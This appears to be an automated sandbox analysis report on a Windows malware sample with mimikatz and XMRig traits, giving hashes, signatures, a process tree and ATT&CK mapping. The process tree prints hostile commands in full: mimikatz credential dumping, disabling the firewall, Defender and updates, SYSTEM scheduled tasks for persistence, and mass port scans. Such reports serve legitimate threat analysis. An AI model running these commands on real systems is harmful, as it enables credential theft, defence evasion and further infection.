Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
27/07/2024, 07:56
General
-
Target
2024-07-27_783b299b629fd4864dd700bcea5d3b01_hacktools_icedid_mimikatz.exe
-
Size
8.1MB
-
MD5
783b299b629fd4864dd700bcea5d3b01
-
SHA1
21a0c8536abfac657c5f5c519626e847161d945a
-
SHA256
66c6fd976f7d64286415122cb30b5c548adcf34a97597a30006a72479f165e84
-
SHA512
68125f49d739db4bd0c5e2af1269e4aaa86ea173fe29f5e9e7fa151295e5ced8723d8a483a2194313f721796d6a8dd88d1fa2f54d5a03ad3d28c48cdcbfcfc9e
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (28706) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 38 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\cvbihzput\nlzvia.exe"C:\Windows\TEMP\cvbihzput\nlzvia.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-07-27_783b299b629fd4864dd700bcea5d3b01_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-07-27_783b299b629fd4864dd700bcea5d3b01_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gsmeclzy\cmzlttq.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\gsmeclzy\cmzlttq.exeC:\Windows\gsmeclzy\cmzlttq.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\gsmeclzy\cmzlttq.exeC:\Windows\gsmeclzy\cmzlttq.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ipfnibzkz\miplfqbtp\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\ipfnibzkz\miplfqbtp\wpcap.exeC:\Windows\ipfnibzkz\miplfqbtp\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ipfnibzkz\miplfqbtp\fmbzpzubz.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ipfnibzkz\miplfqbtp\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\ipfnibzkz\miplfqbtp\fmbzpzubz.exeC:\Windows\ipfnibzkz\miplfqbtp\fmbzpzubz.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ipfnibzkz\miplfqbtp\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ipfnibzkz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ipfnibzkz\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\ipfnibzkz\Corporate\vfshost.exeC:\Windows\ipfnibzkz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hqmltbicq" /ru system /tr "cmd /c C:\Windows\ime\cmzlttq.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hqmltbicq" /ru system /tr "cmd /c C:\Windows\ime\cmzlttq.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mlttgtlhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gsmeclzy\cmzlttq.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mlttgtlhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gsmeclzy\cmzlttq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bmvvzntlq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cvbihzput\nlzvia.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bmvvzntlq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cvbihzput\nlzvia.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 784 C:\Windows\TEMP\ipfnibzkz\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 316 C:\Windows\TEMP\ipfnibzkz\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 2128 C:\Windows\TEMP\ipfnibzkz\2128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 2652 C:\Windows\TEMP\ipfnibzkz\2652.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 2760 C:\Windows\TEMP\ipfnibzkz\2760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 2904 C:\Windows\TEMP\ipfnibzkz\2904.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 2056 C:\Windows\TEMP\ipfnibzkz\2056.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 3888 C:\Windows\TEMP\ipfnibzkz\3888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 3976 C:\Windows\TEMP\ipfnibzkz\3976.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 4040 C:\Windows\TEMP\ipfnibzkz\4040.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 752 C:\Windows\TEMP\ipfnibzkz\752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 1876 C:\Windows\TEMP\ipfnibzkz\1876.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 3792 C:\Windows\TEMP\ipfnibzkz\3792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 1448 C:\Windows\TEMP\ipfnibzkz\1448.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 3092 C:\Windows\TEMP\ipfnibzkz\3092.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 628 C:\Windows\TEMP\ipfnibzkz\628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 2508 C:\Windows\TEMP\ipfnibzkz\2508.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ipfnibzkz\miplfqbtp\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\ipfnibzkz\miplfqbtp\fnlbepubh.exefnlbepubh.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 2544 C:\Windows\TEMP\ipfnibzkz\2544.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ipfnibzkz\qsbphvneu.exeC:\Windows\TEMP\ipfnibzkz\qsbphvneu.exe -accepteula -mp 1020 C:\Windows\TEMP\ipfnibzkz\1020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\ewqksq.exeC:\Windows\SysWOW64\ewqksq.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\cmzlttq.exe1⤵
-
C:\Windows\ime\cmzlttq.exeC:\Windows\ime\cmzlttq.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cvbihzput\nlzvia.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\cvbihzput\nlzvia.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gsmeclzy\cmzlttq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gsmeclzy\cmzlttq.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\cmzlttq.exe1⤵
-
C:\Windows\ime\cmzlttq.exeC:\Windows\ime\cmzlttq.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cvbihzput\nlzvia.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\cvbihzput\nlzvia.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gsmeclzy\cmzlttq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gsmeclzy\cmzlttq.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
8.5MB
MD5a4abf0d27c6f8869629fc42bffdf971d
SHA1b29b1a8b121265d522a6c1b988c1dac00b702d4a
SHA25608bd086136deb01ca280799b4b99672a6a4614dc5d8c04392df7db9cc1a06edd
SHA512991e068b7bcbd912898e100dfe532b3b6a743eb50533ad0263367aac05807ba714f5b9654768b10e00d85bbe5b85ee0926e653d56fd3bec2e58a3632ef7e1c36
-
Filesize
25.9MB
